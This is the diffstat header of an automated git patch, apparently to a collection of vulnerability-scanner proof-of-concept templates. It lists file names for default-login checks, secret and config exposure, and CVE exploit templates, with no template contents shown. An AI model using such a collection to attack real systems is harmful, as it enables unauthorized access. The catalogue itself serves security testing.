From e051e5564c3032758ec1599e6c415ba0af566c5a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 30 Sep 2024 12:43:24 +0000 Subject: [PATCH] 20240930 --- date.txt | 2 +- poc.txt | 1 + poc/adobe/adobe-connect-central-login.yaml | 14 +- .../adobe-connect-username-exposure.yaml | 52 +- poc/adobe/aem-crx-bypass.yaml | 6 + poc/adobe/aem-default-get-servlet-139.yaml | 19 +- poc/adobe/aem-detection-146.yaml | 6 +- poc/adobe/aem-groovyconsole-154.yaml | 17 +- poc/adobe/aem-hash-querybuilder-157.yaml | 11 +- .../aem-querybuilder-internal-path-read.yaml | 8 +- .../aem-querybuilder-json-servlet-187.yaml | 5 - poc/adobe/aem-userinfo-servlet.yaml | 14 +- poc/apache/default-apache-test-page-6816.yaml | 4 +- poc/api/Google-api.yaml | 3 + poc/api/alfacgiapi-wordpress-257.yaml | 62 +- poc/api/api-abstractapi.yaml | 6 +- poc/api/api-abuseipdb.yaml | 2 +- poc/api/api-bible.yaml | 3 +- poc/api/api-bravenewcoin.yaml | 3 +- poc/api/api-buildkite-402.yaml | 12 +- poc/api/api-circleci-405.yaml | 12 +- poc/api/api-covalent.yaml | 3 +- poc/api/api-dropbox-418.yaml | 10 +- poc/api/api-festivo.yaml | 3 +- poc/api/api-harvardart.yaml | 2 +- poc/api/api-improvmx.yaml | 3 +- poc/api/api-instatus.yaml | 3 +- poc/api/api-mailchimp-454.yaml | 3 +- poc/api/api-malwarebazaar.yaml | 2 +- poc/api/api-pastebin.yaml | 3 +- poc/api/api-pivotaltracker.yaml | 2 - poc/api/api-quip.yaml | 3 +- poc/api/api-urlscan.yaml | 2 +- poc/api/apisix-default-login-490.yaml | 20 +- poc/api/arcgis-rest-api.yaml | 5 +- poc/api/bems-api-lfi.yaml | 44 +- poc/api/burp-api-detect.yaml | 4 +- poc/api/gitlab-api-user-enum.yaml | 13 +- poc/api/google-api-key.yaml | 43 +- poc/api/kube-api-namespaces.yaml | 6 +- poc/api/kube-api-secrets.yaml | 4 + poc/api/sendgrid-api-key-10142.yaml | 4 +- poc/api/strapi-cms-detect.yaml | 5 - poc/api/swagger-api-10593.yaml | 14 +- poc/api/twilio-api.yaml | 5 +- poc/api/wadl-api-11083.yaml | 14 +- poc/api/yapi-detect.yaml | 5 +- poc/api/yapi-rce-11726.yaml | 25 +- poc/atlassian/atlassian-crowd-panel-583.yaml | 3 - poc/atlassian/atlassian-crowd-panel.yaml | 17 +- poc/atlassian/bitbucket-takeover-740.yaml | 6 +- poc/atlassian/confluence-detect-1189.yaml | 49 +- .../jira-service-desk-signup-8321.yaml | 1 + .../jira-unauthenticated-dashboards-8324.yaml | 2 +- poc/auth/BlindSQLAuth.yaml | 2 +- poc/auth/Shopify-custom-token.yaml | 5 +- poc/auth/activemq-default-login-47.yaml | 10 +- poc/auth/adobe-connect-central-login.yaml | 14 +- poc/auth/aims-password-mgmt-client.yaml | 10 + poc/auth/aims-password-portal-222.yaml | 2 +- poc/auth/alibaba-mongoshake-unauth.yaml | 2 +- poc/auth/amazon-mws-auth-token-282.yaml | 5 +- poc/auth/amazon-mws-auth-token-value.yaml | 40 +- poc/auth/ambari-default-login.yaml | 13 +- poc/auth/apc-ups-login.yaml | 3 +- poc/auth/apisix-default-login-490.yaml | 20 +- poc/auth/apollo-default-login.yaml | 10 +- poc/auth/arl-default-login-539.yaml | 9 +- poc/auth/atvise-login-589.yaml | 7 +- poc/auth/avatier-password-management.yaml | 27 +- poc/auth/aws-access-key-value-622.yaml | 8 +- poc/auth/azkaban-default-login-674.yaml | 94 +- poc/auth/canal-default-login-848.yaml | 14 +- poc/auth/cisco-systems-login.yaml | 15 +- poc/auth/cisco-ucs-kvm-login-980.yaml | 19 +- poc/auth/clave-login-panel.yaml | 4 +- poc/auth/codian-mcu-login-1139.yaml | 7 +- poc/auth/coldfusion-administrator-login.yaml | 6 +- .../commax-credentials-disclosure-1158.yaml | 3 +- poc/auth/comtrend-password-exposure.yaml | 3 +- poc/auth/credentials.yaml | 5 +- poc/auth/cs141-default-login.yaml | 14 +- poc/auth/dbeaver-credentials.yaml | 16 +- poc/auth/dell-idrac-default-login-6943.yaml | 26 +- poc/auth/dell-idrac9-default-login.yaml | 21 +- poc/auth/dell-wyse-login-6955.yaml | 7 +- poc/auth/django-secret.key.yaml | 45 +- poc/auth/druid-default-login.yaml | 9 +- poc/auth/emqx-default-login-7222.yaml | 9 +- poc/auth/exacqvision-default-login-7277.yaml | 5 +- poc/auth/facebook-secret.yaml | 4 +- poc/auth/fcm-server-key-7454.yaml | 3 +- poc/auth/frp-default-login-7557.yaml | 13 +- poc/auth/ftp-credentials-exposure.yaml | 6 +- poc/auth/git-credentials.yaml | 3 - poc/auth/gitea-login-7645.yaml | 4 +- poc/auth/gitlab-public-signup-7684.yaml | 9 +- poc/auth/gloo-unauth-7726.yaml | 5 + poc/auth/glpi-authentication-7727.yaml | 7 +- poc/auth/glpi-default-login-7732.yaml | 18 +- poc/auth/google-api-key.yaml | 43 +- poc/auth/google-earth-dlogin-7780.yaml | 6 + poc/auth/grafana-default-login.yaml | 18 +- poc/auth/hadoop-unauth.yaml | 9 +- .../hpe-system-management-login-8014.yaml | 54 +- ...awei-hg532e-default-router-login-8064.yaml | 9 +- poc/auth/hue-default-credential-8081.yaml | 23 +- poc/auth/ibm-mqseries-default-login-8107.yaml | 90 +- poc/auth/ibm-note-login-8110.yaml | 5 +- poc/auth/idemia-biometrics-default-login.yaml | 11 +- poc/auth/iptime-default-login-8192.yaml | 14 +- poc/auth/jinher-oa-default-login-8311.yaml | 10 +- poc/auth/jira-service-desk-signup-8321.yaml | 1 + .../jira-unauthenticated-dashboards-8324.yaml | 2 +- ...jira-unauthenticated-user-picker-8341.yaml | 13 +- poc/auth/jmx-default-login-8354.yaml | 20 +- poc/auth/keenetic-web-login-8442.yaml | 6 +- poc/auth/kentico-login.yaml | 3 +- poc/auth/keycloak-json-8472.yaml | 14 +- poc/auth/keycloak-openid-config.yaml | 6 +- poc/auth/kube-api-secrets.yaml | 4 + .../kyan-network-credentials-disclosure.yaml | 6 - poc/auth/lansweeper-login.yaml | 4 +- poc/auth/lutron-iot-default-login.yaml | 3 + .../mantisbt-default-credential-8779.yaml | 59 +- poc/auth/mofi4500-default-login.yaml | 3 +- poc/auth/mongodb-unauth-8926.yaml | 6 +- poc/auth/nagios-default-login.yaml | 3 - poc/auth/netsus-default-login.yaml | 9 +- poc/auth/nexus-default-password.yaml | 3 + poc/auth/nps-default-password.yaml | 3 - poc/auth/oauth2-detect.yaml | 54 +- poc/auth/octobercms-default-login.yaml | 17 +- poc/auth/ofbiz-default-login-9210.yaml | 14 - poc/auth/openemr-default-login.yaml | 11 +- poc/auth/pieregister-open-redirect.yaml | 13 +- .../putty-private-key-disclosure-9730.yaml | 28 +- poc/auth/rancher-default-login.yaml | 3 +- poc/auth/rockmongo-default-credentials.yaml | 5 - poc/auth/rockmongo-default-login.yaml | 3 +- poc/auth/sauter-login-10091.yaml | 5 +- poc/auth/sendgrid-api-key-10142.yaml | 4 +- .../servicenow-helpdesk-credential-10174.yaml | 10 +- poc/auth/sgp-login-panel-10185.yaml | 3 +- poc/auth/sharecenter-login-10189.yaml | 3 - poc/auth/shopify-token.yaml | 6 +- poc/auth/shoppable-token-10206.yaml | 3 - poc/auth/showdoc-default-login-10221.yaml | 11 +- poc/auth/sitefinity-login.yaml | 9 +- poc/auth/somfy-login.yaml | 2 +- poc/auth/sonarqube-login-10376.yaml | 7 +- poc/auth/spectracom-default-login.yaml | 17 +- poc/auth/sphider-login-10408.yaml | 4 +- poc/auth/squirrelmail-login-10521.yaml | 4 - poc/auth/ssrf-via-oauth-misconfig.yaml | 3 +- .../stem-audio-table-private-keys-10534.yaml | 5 - poc/auth/symantec-dlp-login.yaml | 3 +- poc/auth/symantec-epm-login.yaml | 4 +- poc/auth/symantec-ewep-login-10605.yaml | 7 +- poc/auth/tomcat-default-login.yaml | 12 +- poc/auth/trilithic-viewpoint-login.yaml | 20 +- poc/auth/twitter-secret(1).yaml | 6 +- poc/auth/unauth-rlm-10960.yaml | 10 +- poc/auth/unauth-wavink-panel.yaml | 5 +- poc/auth/unauth-xproxy-dashboard-10969.yaml | 17 +- poc/auth/unauthenticated-frp.yaml | 7 +- poc/auth/unauthenticated-netdata-10918.yaml | 10 +- poc/auth/unauthenticated-prtg.yaml | 9 +- ...thenticated-varnish-cache-purge-10933.yaml | 3 + poc/auth/unauthorized-h3csecparh-login.yaml | 5 +- poc/auth/unauthorized-hp-printer.yaml | 4 + ...ized-puppet-node-manager-detect-10959.yaml | 44 +- poc/auth/versa-default-login-11003.yaml | 19 +- poc/auth/vigor-login-11020.yaml | 6 +- poc/auth/vpms-auth-bypass-11069.yaml | 11 +- poc/auth/wifisky-default-password.yaml | 8 +- poc/auth/wordpress-weak-credentials.yaml | 7 - poc/auth/wpdm-cache-session-11439.yaml | 3 + poc/auth/wso2-default-login.yaml | 11 +- poc/auth/xenmobile-login-11677.yaml | 3 + poc/auth/zabbix-default-login-11760.yaml | 15 +- poc/auth/zabbix-server-login-11769.yaml | 6 +- poc/auth/zhiyuan-oa-session-leak-11802.yaml | 5 +- poc/auth/zhiyuan-oa-unauthorized-11806.yaml | 6 + poc/auth/zimbra-preauth-ssrf-11810.yaml | 20 +- poc/auth/zmanda-default-login-11826.yaml | 7 +- poc/auth/zoho-webhook-token-11835.yaml | 2 + poc/aws/S3Hunter.yaml | 3 +- poc/aws/amazon-mws-auth-token-282.yaml | 5 +- poc/aws/amazon-mws-auth-token-value.yaml | 40 +- poc/aws/aws-access-key-value-622.yaml | 8 +- poc/aws/s3-subtakeover.yaml | 4 + ...ordpress-total-upkeep-backup-download.yaml | 11 +- poc/backup/zip-backup-files-11820.yaml | 125 +- poc/cisco/cisco-network-config.yaml | 5 +- poc/cisco/cisco-prime-infrastructure-952.yaml | 2 +- poc/cisco/cisco-smi-exposure-970.yaml | 2 +- poc/cisco/cisco-systems-login.yaml | 15 +- poc/cisco/cisco-ucs-kvm-login-980.yaml | 19 +- poc/cnnvd/resin-cnnvd-200705-315-9865.yaml | 1 + poc/cnvd/CNVD-2019-32204.yaml | 3 - poc/cnvd/CNVD-2020-46552.yaml | 1 + poc/cnvd/CNVD-2021-10543.yaml | 10 +- poc/cnvd/CNVD-2021-14536.yaml | 8 +- poc/cnvd/CNVD-2021-15822.yaml | 8 +- poc/cnvd/CNVD-2021-15824.yaml | 4 - poc/cnvd/CNVD-2021-26422.yaml | 11 - poc/cnvd/CNVD-2021-28277.yaml | 15 +- poc/cnvd/CNVD-2021-30167.yaml | 19 +- poc/cnvd/CNVD-2022-03672.yaml | 13 +- poc/cnvd/cnvd-2018-13393-1037.yaml | 14 +- poc/cnvd/cnvd-2019-01348-1040.yaml | 12 +- poc/cnvd/cnvd-2020-23735-1055.yaml | 9 +- poc/cnvd/cnvd-2020-67113-1070.yaml | 21 +- poc/cnvd/cnvd-2020-68596-1073.yaml | 12 +- poc/cnvd/cnvd-2021-15822-1094.yaml | 11 +- .../coldfusion-administrator-login.yaml | 6 +- poc/coldfusion/coldfusion-debug-xss.yaml | 5 +- .../unpatched-coldfusion-10978.yaml | 2 + poc/config/aerohive-netconfig-ui-201.yaml | 70 +- poc/config/bigip-config-utility-detect.yaml | 13 +- poc/config/buffalo-config-injection.yaml | 7 +- poc/config/circleci-ssh-config.yaml | 2 +- poc/config/cisco-network-config.yaml | 5 +- poc/config/configuration-listing-1184.yaml | 6 +- poc/config/confluence-detect-1189.yaml | 49 +- poc/config/docker-compose-config.yaml | 4 - poc/config/dockercfg-config.yaml | 6 - poc/config/esmtprc-config-7258.yaml | 13 +- poc/config/front-page-misconfig.yaml | 10 +- poc/config/ftpconfig-7566.yaml | 33 +- poc/config/ftpconfig.yaml | 3 + poc/config/git-config-7636.yaml | 32 +- poc/config/joomla-config-file.yaml | 6 +- poc/config/keycloak-openid-config.yaml | 6 +- poc/config/magento-config.yaml | 6 +- poc/config/misconfigured-docker-8900.yaml | 8 +- poc/config/msmtp-config-8967.yaml | 5 - poc/config/nginx-config.yaml | 10 +- poc/config/phpmyadmin-misconfiguration.yaml | 1 - poc/config/rconfig-rce.yaml | 20 +- poc/config/samba-config-9987.yaml | 4 + poc/config/ssrf-via-oauth-misconfig.yaml | 3 +- poc/config/tcpconfig-10665.yaml | 2 +- poc/config/tugboat-config-exposure-10842.yaml | 5 - poc/config/web-config-11126.yaml | 154 +- .../wordpress-accessible-wpconfig-11236.yaml | 2 +- poc/config/wordpress-git-config-11278.yaml | 11 +- poc/crlf_injection/crlf-injection-1262.yaml | 13 +- .../viewlinc-crlf-injection-11015.yaml | 13 +- .../csrfguard-detect-1291.yaml | 20 +- poc/cve/CVE-2007-4556.yaml | 26 +- poc/cve/CVE-2009-0932.yaml | 24 +- poc/cve/CVE-2011-0049.yaml | 2 +- poc/cve/CVE-2012-0392.yaml | 24 +- poc/cve/CVE-2013-1965.yaml | 23 +- poc/cve/CVE-2015-5688.yaml | 38 +- poc/cve/CVE-2015-6544.yaml | 5 - poc/cve/CVE-2015-8349.yaml | 5 + poc/cve/CVE-2016-10033.yaml | 33 +- poc/cve/CVE-2016-5649.yaml | 17 +- poc/cve/CVE-2017-1000028.yaml | 58 +- poc/cve/CVE-2017-12542.yaml | 10 +- poc/cve/CVE-2017-12611.yaml | 5 - poc/cve/CVE-2017-12635.yaml | 13 +- poc/cve/CVE-2017-14535.yaml | 14 +- poc/cve/CVE-2017-14537.yaml | 22 +- poc/cve/CVE-2017-3506.yaml | 18 +- poc/cve/CVE-2017-6090.yaml | 8 +- poc/cve/CVE-2017-7529.yaml | 2 +- poc/cve/CVE-2017-9506.yaml | 44 +- poc/cve/CVE-2017-9805.yaml | 136 +- poc/cve/CVE-2018-1000129.yaml | 42 +- poc/cve/CVE-2018-1000861.yaml | 23 +- poc/cve/CVE-2018-15535.yaml | 13 +- poc/cve/CVE-2018-18069.yaml | 14 +- poc/cve/CVE-2018-2893.yaml | 19 +- poc/cve/CVE-2018-5230.yaml | 9 + poc/cve/CVE-2018-5233.yaml | 5 - poc/cve/CVE-2018-6910.yaml | 23 +- poc/cve/CVE-2018-7700.yaml | 27 +- poc/cve/CVE-2018-8033.yaml | 7 - poc/cve/CVE-2019-13396.yaml | 67 +- poc/cve/CVE-2019-14205.yaml | 53 +- poc/cve/CVE-2019-15043.yaml | 70 +- poc/cve/CVE-2019-16759.yaml | 45 +- poc/cve/CVE-2019-16997.yaml | 14 +- poc/cve/CVE-2019-19781.yaml | 31 +- poc/cve/CVE-2019-19985.yaml | 10 +- poc/cve/CVE-2019-20141.yaml | 6 - poc/cve/CVE-2019-5418.yaml | 2 +- poc/cve/CVE-2019-6112.yaml | 6 - poc/cve/CVE-2019-7256.yaml | 10 +- poc/cve/CVE-2019-8451.yaml | 42 +- poc/cve/CVE-2020-10199.yaml | 20 +- poc/cve/CVE-2020-11738.yaml | 19 +- poc/cve/CVE-2020-13483.yaml | 21 +- poc/cve/CVE-2020-13700.yaml | 13 +- poc/cve/CVE-2020-14413.yaml | 5 - poc/cve/CVE-2020-15148.yaml | 29 +- poc/cve/CVE-2020-17456.yaml | 25 +- poc/cve/CVE-2020-21224.yaml | 7 +- poc/cve/CVE-2020-24186.yaml | 18 +- poc/cve/CVE-2020-24571.yaml | 5 + poc/cve/CVE-2020-24579.yaml | 40 +- poc/cve/CVE-2020-25078.yaml | 21 +- poc/cve/CVE-2020-27735.yaml | 5 + poc/cve/CVE-2020-35489.yaml | 24 +- poc/cve/CVE-2020-35736.yaml | 2 +- poc/cve/CVE-2020-35951.yaml | 2 +- poc/cve/CVE-2020-36112.yaml | 36 +- poc/cve/CVE-2020-5515.yaml | 0 poc/cve/CVE-2020-5902.yaml | 53 +- poc/cve/CVE-2020-8115.yaml | 2 +- poc/cve/CVE-2020-8191.yaml | 37 +- poc/cve/CVE-2020-8515.yaml | 10 +- poc/cve/CVE-2020-8644.yaml | 4 +- poc/cve/CVE-2020-8982.yaml | 33 +- poc/cve/CVE-2021-20150.yaml | 24 +- poc/cve/CVE-2021-21816.yaml | 19 +- poc/cve/CVE-2021-22502.yaml | 9 +- poc/cve/CVE-2021-24286.yaml | 3 - poc/cve/CVE-2021-3017.yaml | 20 +- poc/cve/CVE-2021-31537.yaml | 5 +- poc/cve/CVE-2021-35587.yaml | 24 +- poc/cve/CVE-2021-45967.yaml | 17 +- poc/cve/CVE-2022-0378.yaml | 20 +- poc/cve/CVE-2022-24682.yaml | 102 +- poc/cve/CVE-2022-26159.yaml | 15 +- poc/cve/CVE-2022-28363.yaml | 21 +- poc/cve/CVE-2022-41352.yaml | 78 +- poc/cve/CVE-2023-6016.yaml | 98 +- poc/cve/CVE-2023-6019.yaml | 86 +- poc/cve/CVE-2023-6975.yaml | 80 +- poc/cve/CVE-2024-2912.yaml | 58 +- poc/cve/CVE-2024-5550.yaml | 60 +- poc/cve/cve-2020-8115.yaml | 15 +- poc/cve/cve-2021-44152.yaml | 21 +- poc/cve/cve-2022-29303.yaml | 28 +- poc/cve/cve-2024-3400.yaml | 113 +- poc/cve/exploit-cve-2022-1388.yaml | 72 +- poc/cve/rce-cve-2021-41773.yaml | 55 +- poc/cve/springForShell-CVE-2022-22963.yaml | 75 +- poc/debug/coldfusion-debug-xss.yaml | 5 +- poc/debug/laravel-debug-enabled-8574.yaml | 14 +- poc/debug/pyramid-debug-toolbar.yaml | 3 - poc/debug/wamp-xdebug-detect.yaml | 7 +- poc/debug/werkzeug-debugger-detect-11197.yaml | 7 +- poc/debug/wordpress-debug-log-11258.yaml | 4 +- poc/default/activemq-default-login-47.yaml | 10 +- poc/default/aem-default-get-servlet-139.yaml | 19 +- poc/default/ambari-default-login.yaml | 13 +- poc/default/apisix-default-login-490.yaml | 20 +- poc/default/apollo-default-login.yaml | 10 +- poc/default/arl-default-login-539.yaml | 9 +- poc/default/azkaban-default-login-674.yaml | 94 +- poc/default/canal-default-login-848.yaml | 14 +- poc/default/cs141-default-login.yaml | 14 +- .../default-apache-test-page-6816.yaml | 4 +- .../default-centos-test-page-6826.yaml | 12 +- poc/default/default-django-page-6841.yaml | 4 +- poc/default/default-iis7-page.yaml | 17 +- poc/default/default-openresty.yaml | 7 +- .../default-oracle-application-page-6891.yaml | 4 +- .../default-redhat-test-page-6903.yaml | 12 +- .../dell-idrac-default-login-6943.yaml | 26 +- poc/default/dell-idrac9-default-login.yaml | 21 +- poc/default/druid-default-login.yaml | 9 +- poc/default/emqx-default-login-7222.yaml | 9 +- .../exacqvision-default-login-7277.yaml | 5 +- poc/default/frp-default-login-7557.yaml | 13 +- poc/default/glpi-default-login-7732.yaml | 18 +- poc/default/grafana-default-login.yaml | 18 +- ...awei-hg532e-default-router-login-8064.yaml | 9 +- poc/default/hue-default-credential-8081.yaml | 23 +- .../ibm-mqseries-default-login-8107.yaml | 90 +- .../idemia-biometrics-default-login.yaml | 11 +- poc/default/iptime-default-login-8192.yaml | 14 +- poc/default/jinher-oa-default-login-8311.yaml | 10 +- poc/default/jmx-default-login-8354.yaml | 20 +- poc/default/lighttpd-default-8627.yaml | 14 +- poc/default/lutron-iot-default-login.yaml | 3 + .../mantisbt-default-credential-8779.yaml | 59 +- poc/default/mofi4500-default-login.yaml | 3 +- poc/default/nagios-default-login.yaml | 3 - poc/default/netsus-default-login.yaml | 9 +- poc/default/nexus-default-password.yaml | 3 + poc/default/nps-default-password.yaml | 3 - poc/default/octobercms-default-login.yaml | 17 +- poc/default/ofbiz-default-login-9210.yaml | 14 - poc/default/openemr-default-login.yaml | 11 +- poc/default/rancher-default-login.yaml | 3 +- .../rockmongo-default-credentials.yaml | 5 - poc/default/rockmongo-default-login.yaml | 3 +- poc/default/showdoc-default-login-10221.yaml | 11 +- poc/default/spectracom-default-login.yaml | 17 +- poc/default/tomcat-default-login.yaml | 12 +- poc/default/versa-default-login-11003.yaml | 19 +- poc/default/wifisky-default-password.yaml | 8 +- poc/default/wso2-default-login.yaml | 11 +- poc/default/zabbix-default-login-11760.yaml | 15 +- poc/default/zmanda-default-login-11826.yaml | 7 +- poc/detect/Biometric-detect.yaml | 1 + poc/detect/aem-detection-146.yaml | 6 +- poc/detect/autobahn-python-detect-593.yaml | 8 +- poc/detect/bedita-detect.yaml | 50 +- poc/detect/bigip-config-utility-detect.yaml | 13 +- poc/detect/burp-api-detect.yaml | 4 +- poc/detect/cacti-detect.yaml | 3 +- poc/detect/carestream-vue-detect-861.yaml | 11 +- poc/detect/chevereto-detect.yaml | 8 +- poc/detect/citrix-adc-gateway-detect-983.yaml | 8 +- poc/detect/confluence-detect-1189.yaml | 49 +- poc/detect/contentkeeper-detect.yaml | 3 +- poc/detect/csrfguard-detect-1291.yaml | 20 +- poc/detect/darkstat-detect.yaml | 3 - poc/detect/dell-idrac6-detect.yaml | 2 +- poc/detect/dell-idrac7-detect-6922.yaml | 8 +- poc/detect/detect-dns-over-https.yaml | 6 +- poc/detect/detect-drone.yaml | 5 +- poc/detect/detect-sentry-6983.yaml | 11 +- poc/detect/dns-waf-detect-7054.yaml | 5 - .../elasticsearch-sql-client-detect.yaml | 43 +- poc/detect/froxlor-detect-7552.yaml | 9 +- poc/detect/gitlab-detect.yaml | 2 + poc/detect/grafana-detect.yaml | 7 - poc/detect/graphql-detect.yaml | 4 +- poc/detect/grav-cms-detect-7842.yaml | 12 +- poc/detect/gunicorn-detect.yaml | 10 +- poc/detect/itop-detect.yaml | 5 - poc/detect/jaspersoft-detect.yaml | 1 + poc/detect/jboss-detect.yaml | 24 +- poc/detect/jeedom-detect.yaml | 5 - poc/detect/jenkins-detect.yaml | 5 - poc/detect/kevinlab-device-detect-8461.yaml | 6 +- poc/detect/linkerd-service-detect-8634.yaml | 25 +- poc/detect/linkerd-ssrf-detect.yaml | 9 - poc/detect/lucee-detect-8661.yaml | 26 +- poc/detect/lucee-detect.yaml | 8 +- poc/detect/magmi-detect.yaml | 2 +- .../microsoft-echange-server-detect.yaml | 6 - poc/detect/moinmoin-detect-8917.yaml | 11 +- poc/detect/mrtg-detect-8958.yaml | 17 +- poc/detect/mrtg-detect.yaml | 2 + poc/detect/neos-detect.yaml | 9 +- poc/detect/nexus-detect.yaml | 42 +- poc/detect/oauth2-detect.yaml | 54 +- poc/detect/octobercms-detect-9196.yaml | 12 +- poc/detect/oipm-detect-9219.yaml | 11 +- poc/detect/openx-detect.yaml | 11 +- poc/detect/php-proxy-detect-9544.yaml | 11 +- poc/detect/pi-hole-detect-9581.yaml | 1 + .../prometheus-exporter-detect-9676.yaml | 2 - poc/detect/prtg-detect.yaml | 4 - poc/detect/puppetserver-detect-9723.yaml | 17 +- poc/detect/ranger-detection-9830.yaml | 54 +- poc/detect/rdp-detect-9840.yaml | 20 +- poc/detect/redcap-detector-9850.yaml | 5 - poc/detect/redmine-cli-detect-9854.yaml | 6 +- poc/detect/rhymix-cms-detect.yaml | 8 +- poc/detect/samba-detect-9988.yaml | 10 +- poc/detect/sap-netweaver-detect-10044.yaml | 6 +- poc/detect/secmail-detect.yaml | 3 +- poc/detect/seeddms-detect-10129.yaml | 40 +- poc/detect/shiro-detect.yaml | 9 +- poc/detect/shopware-detect.yaml | 4 - poc/detect/strapi-cms-detect.yaml | 5 - poc/detect/tech-detect-10672.yaml | 511 +- poc/detect/terraform-detect-10708.yaml | 8 +- poc/detect/thinkcmf-detect.yaml | 17 +- ...ized-puppet-node-manager-detect-10959.yaml | 44 +- poc/detect/virtual-ema-detect.yaml | 2 +- poc/detect/vsftpd-detection.yaml | 16 +- poc/detect/wamp-xdebug-detect.yaml | 7 +- poc/detect/wazuh-detect.yaml | 3 - poc/detect/weblogic-detect-11144.yaml | 15 +- .../werkzeug-debugger-detect-11197.yaml | 7 +- poc/detect/wordpress-plugins-detect.yaml | 28 +- poc/detect/wordpress-themes-detect-11316.yaml | 23 +- .../wp-xmlrpc-pingback-detection-11627.yaml | 2 +- poc/detect/yapi-detect.yaml | 5 +- .../Apexis-IPCAM-directory-traversal.yaml | 0 ...filedownload-directory-traversal-7171.yaml | 3 +- ...gy-springframework-directoryTraversal.yaml | 0 .../erp-nc-directory-traversal.yaml | 4 + .../flir-path-traversal.yaml | 7 +- ...bm-infoprint-directory-traversal-8098.yaml | 13 +- .../natshell-path-traversal.yaml | 19 +- .../oa-tongda-path-traversal-9177.yaml | 6 +- .../pmb-directory-traversal.yaml | 13 +- .../tpshop-directory-traversal.yaml | 17 +- .../wooyun-path-traversal.yaml | 22 +- poc/docker/docker-compose-config.yaml | 4 - poc/docker/dockercfg-config.yaml | 6 - poc/docker/dockerfile-hidden-disclosure.yaml | 3 +- .../kubernetes-enterprise-manager-8528.yaml | 10 +- poc/docker/kubernetes-pods-8542.yaml | 19 +- poc/docker/kubernetes-version.yaml | 13 +- poc/docker/misconfigured-docker-8900.yaml | 8 +- poc/elk/0xelkotsqli.yaml | 958 +- poc/elk/elasticsearch-sql-client-detect.yaml | 43 +- poc/elk/exposed-kibana.yaml | 10 +- poc/elk/kibana-panel.yaml | 4 - .../adobe-connect-username-exposure.yaml | 52 +- poc/exposed/ansible-tower-exposure.yaml | 29 +- poc/exposed/appspec-yml-disclosure-529.yaml | 3 +- poc/exposed/beward-ipcamera-disclosure.yaml | 9 +- poc/exposed/cisco-smi-exposure-970.yaml | 2 +- .../clockwork-dashboard-exposure-1012.yaml | 60 +- .../commax-credentials-disclosure-1158.yaml | 3 +- poc/exposed/comtrend-password-exposure.yaml | 3 +- poc/exposed/couchdb-exposure-1239.yaml | 5 +- poc/exposed/dockerfile-hidden-disclosure.yaml | 3 +- poc/exposed/exposed-adb-7280.yaml | 15 +- poc/exposed/exposed-alps-spring-7284.yaml | 16 +- poc/exposed/exposed-kibana.yaml | 10 +- poc/exposed/exposed-nomad-7327.yaml | 71 +- poc/exposed/exposed-redis-7337.yaml | 4 +- poc/exposed/exposed-sqlite-manager-7350.yaml | 3 - poc/exposed/exposed-svn-7352.yaml | 9 +- poc/exposed/exposed-swagger.yaml | 78 +- poc/exposed/ftp-credentials-exposure.yaml | 6 +- poc/exposed/gogs-install-exposure.yaml | 2 +- poc/exposed/iceflow-vpn-disclosure.yaml | 13 +- poc/exposed/iis-internal-ip-disclosure.yaml | 19 +- .../kyan-network-credentials-disclosure.yaml | 6 - poc/exposed/lvmeng-uts-disclosure.yaml | 8 +- poc/exposed/monitorix-exposure.yaml | 2 +- .../prometheus-exposed-panel-9684.yaml | 6 +- .../putty-private-key-disclosure-9730.yaml | 28 +- poc/exposed/qihang-media-disclosure.yaml | 3 +- .../ruijie-information-disclosure-9932.yaml | 22 +- .../ruijie-information-disclosure.yaml | 5 + poc/exposed/sensitive-storage-exposure.yaml | 3 +- poc/exposed/thumbs-db-disclosure-10763.yaml | 6 +- .../tugboat-config-exposure-10842.yaml | 5 - .../wp-mailchimp-log-exposure-11492.yaml | 9 +- poc/ftp/ftp-credentials-exposure.yaml | 6 +- poc/ftp/ftpconfig-7566.yaml | 33 +- poc/ftp/ftpconfig.yaml | 3 + poc/ftp/vsftpd-detection.yaml | 16 +- poc/fuzz/xss-fuzz-11701.yaml | 6 +- poc/git/Digital-Signage-rce.yaml | 13 +- poc/git/git-config-7636.yaml | 32 +- poc/git/git-credentials.yaml | 3 - poc/git/gitea-login-7645.yaml | 4 +- poc/git/gitlab-api-user-enum.yaml | 13 +- poc/git/gitlab-detect.yaml | 2 + poc/git/gitlab-public-repos.yaml | 8 +- poc/git/gitlab-public-signup-7684.yaml | 9 +- poc/git/wordpress-git-config-11278.yaml | 11 +- poc/google/Google-api.yaml | 3 + poc/google/google-api-key.yaml | 43 +- poc/google/google-earth-dlogin-7780.yaml | 6 + poc/google/metadata-google-8820.yaml | 10 +- poc/graphql/graphql-array-batching-7827.yaml | 26 +- poc/graphql/graphql-detect.yaml | 4 +- poc/header/header-command-injection-7917.yaml | 17 +- poc/header/log4j-header.yaml | 79 +- .../oob-header-based-interaction-9250.yaml | 3 +- poc/header/sqliheader.yaml | 4 +- poc/http/detect-dns-over-https.yaml | 6 +- poc/http/lighttpd-default-8627.yaml | 14 +- poc/ibm/ibm-infoprint-lfi.yaml | 2 - poc/ibm/ibm-mqseries-default-login-8107.yaml | 90 +- poc/ibm/ibm-note-login-8110.yaml | 5 +- poc/ibm/ibm-service-assistant.yaml | 8 +- poc/injection/GLPI-9.3.3-SQL-Injection.yaml | 55 +- poc/injection/buffalo-config-injection.yaml | 7 +- poc/injection/crlf-injection-1262.yaml | 13 +- .../header-command-injection-7917.yaml | 17 +- .../viewlinc-crlf-injection-11015.yaml | 13 +- poc/injection/weiphp-sql-injection.yaml | 16 +- ...gy-springframework-directoryTraversal.yaml | 0 poc/java/exposed-alps-spring-7284.yaml | 16 +- poc/java/java-melody-xss-8225.yaml | 7 +- poc/java/jboss-detect.yaml | 24 +- poc/java/jboss-status-8241.yaml | 64 +- poc/java/jinfornet-jreport-lfi-8309.yaml | 5 - poc/java/public-tomcat-manager-9709.yaml | 10 +- poc/java/shiro-detect.yaml | 9 +- poc/java/springForShell-CVE-2022-22963.yaml | 75 +- .../springboot-actuators-jolokia-xxe.yaml | 19 +- poc/java/springboot-dump.yaml | 1 + poc/java/springboot-heapdump-10463.yaml | 8 +- poc/java/springboot-info.yaml | 9 +- poc/java/springboot-log4j-rce.yaml | 7 +- poc/java/springboot-loggers-10475.yaml | 18 +- poc/java/springboot-mappings.yaml | 4 +- poc/java/springboot-threaddump-10484.yaml | 9 +- poc/java/springboot-trace-10492.yaml | 9 +- poc/java/tomcat-default-login.yaml | 12 +- poc/java/tomcat-scripts-10802.yaml | 2 - poc/java/weblogic-detect-11144.yaml | 15 +- 